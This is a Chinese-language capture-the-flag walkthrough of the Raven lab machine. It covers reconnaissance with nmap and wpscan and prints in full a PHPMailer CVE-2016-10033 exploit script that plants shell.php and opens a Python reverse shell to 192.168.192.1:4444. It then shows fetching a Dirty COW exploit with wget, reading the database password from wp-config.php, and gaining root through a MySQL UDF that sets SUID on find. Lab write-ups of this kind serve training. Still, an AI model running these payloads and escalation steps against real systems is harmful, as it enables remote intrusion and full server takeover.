信息收集
主机发现
nmap -sP 192.168.192.0/24
端口扫描
nmap -A -p- 192.168.192.195
开启端口
22 80 111 42989
访问80端口
目录遍历
dirsearch -u http://192.168.192.195
发现敏感目录
/wp-login.php /vendor /wordpress /wordpress/wp-content/uploads/
找到flag1
http://192.168.192.195/vendor/PATH
因为该站为wordpress搭建,所以使用wpscan工具进行扫描
扫描用户
wpscan -u http://192.168.192.195/wordpress -e u
找到用户
michael steven
渗透过程
使用searchsploit搜索phpmailer
使用 40974.py文件
searchsploit -m 40974
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
# Cosmetic terminal clear, but note it is a shell subprocess: the script's very
# first action is spawning /bin/sh -c, which stands out in process auditing.
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

# All configuration is hard-coded: the target host, the vulnerable contact
# form, the name of the file that ends up in the web root, and the callback
# address embedded in `payload`. `backdoor` must agree with the file name in
# fields['email'] below, otherwise the final GET checks the wrong path.
# target = 'http://localhost:8080'
target = 'http://raven.local/'
vuln = "/contact.php"
# backdoor = '/backdoor.php'
backdoor = '/shell.php'
# PHP stub that is written into the dropped file. When the server executes
# it, it connects back to 192.168.192.1:4444 (the `nc -lvp 4444` listener in
# the write-up) and attaches /bin/sh to that socket. The escaping is layered
# (Python literal -> PHP single-quoted system() argument -> python -c
# triple-quoted string), so the byte sequence is fragile.
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.192.1\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
# payload = '<?php @eval($_REQUEST[777]);phpinfo();?>'
# Contact-form fields. `email` is the injection point: the quoted local part
# with an escaped `"` carries extra sendmail options, and `-X` redirects the
# sendmail log to a path under the web root, so the message body (which
# includes `payload` via the `name` field) is persisted as shell.php.
# Detection: a sender address containing `-O`/`-X` tokens in web or mail logs
# is a direct indicator of this attack class; mitigation is PHPMailer >= 5.2.18.
fields={'action': 'submit',
        'name': payload,
        # 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
        'message': 'Pwned'}
# The fixed multipart boundary is itself a fingerprint: real browsers
# generate a fresh WebKitFormBoundary value per request.
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
# headers={'User-Agent': 'curl/7.47.0',
# Spoofed desktop-browser UA; UA alone is not a reliable signal for defenders,
# the form content is.
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36',
         'Content-Type': m.content_type}
# NOTE: `proxies` is defined but never passed to requests.post/get below, so
# traffic goes directly to the target, not through a local proxy on 8081.
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
# Step 1: submit the form. No timeout and no status check, so a filtered or
# failed POST is not detected; the script proceeds regardless.
# r = requests.post(target, data=m.to_string(),
r = requests.post(target + vuln, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
# Step 2: request the dropped file so the server executes it. A 200 only shows
# the file was served; it does not prove the callback reached the listener.
# Presumably PHP's system() blocks until the spawned shell exits, so this GET
# may not return (and the line below may not print) until the session ends.
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    # print('[+] ExPLoITeD ' + target)
    print('[+] ExPLoITeD ' + target + backdoor)
开启监听端口
nc -lvp 4444
运行脚本,成功反弹shell
获取到www用户权限,切换一下shell
python -c 'import pty; pty.spawn("/bin/bash")'
查看下内核版本
uname -a
尝试脏牛漏洞提权
searchsploit cow
-------------------------------------------------------------------------------------------------------------------------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------
Carel pCOWeb < B1.2.1 - Credentials Disclosure | hardware/webapps/46898.txt
Carel pCOWeb < B1.2.1 - Cross-Site Scripting | hardware/webapps/46897.txt
Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal | hardware/webapps/50986.txt
CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal | java/webapps/35781.txt
CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting | hardware/remote/35779.txt
coWiki - 'index.php' Cross-Site Scripting | php/webapps/30515.txt
COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow | windows/local/8780.php
Jcow 4.2.1 - Local File Inclusion | php/webapps/17297.txt
Jcow Social Networking Script 4.2 < 5.2 - Arbitrary Code Execution (Metasploit) | php/webapps/17722.rb
jetAudio 7.0.5 COWON Media Center MP4 - Local Stack Overflow | windows/local/4751.pl
JetAudio 7.5.3 COWON Media Center - '.wav' Crash | windows/dos/9139.pl
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Mailcow 0.14 - Cross-Site Request Forgery | php/webapps/42004.txt
phpCow 2.1 - File Inclusion | php/webapps/15447.txt
Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion | php/webapps/2896.py
-------------------------------------------------------------------------------------------------------------------------------------------------
这里使用linux/local/40839.c
进行尝试
自己主机开启一个http服务
sudo python3 -m http.server -d /usr/share/exploitdb/exploits/linux/local 80
cd 到/tmp目录下,使用wget下载exp文件
cd /tmp
wget http://172.24.71.180/40839.c
gcc -pthread 40839.c -o 40839 -lcrypt
./40839
查看是否添加了用户
cat /etc/passwd
发现并未添加,提权失败
查看www目录,发现目录下存在flag2
flag2{6a8ed560f0b5358ecf844108048eb337}
进入/var/www/html/wordpress目录
查看wp-config.php文件,读取到数据库密码root : R@v3nSecurity
mysql udf提权
获取exp
searchsploit mysql udf
------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------- ---------------------------------
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1) | linux/local/1181.c
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) | linux/local/1518.c
MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution | windows/remote/3274.txt
MySQL 4/5/6 - UDF for Command Execution | linux/local/7856.txt
------------------------------------------------------------------------- ---------------------------------
编译exp
searchsploit -p linux/local/1518.c
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
将1518.so 文件上传到/tmp 目录下。
进入到数据库
mysql -uroot -pR@v3nSecurity
create database fredg0n;
use fredg0n;
create table fredg0n(line blob);
insert into fredg0n values(load_file('/tmp/1518.so'));
select * from fredg0n into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
select do_system('chmod u+s /usr/bin/find');
suid提权
ls -alh /usr/bin/find
mkdir fredg0n
find fredg0n -exec '/bin/sh' \;
提权成功,拿到flag4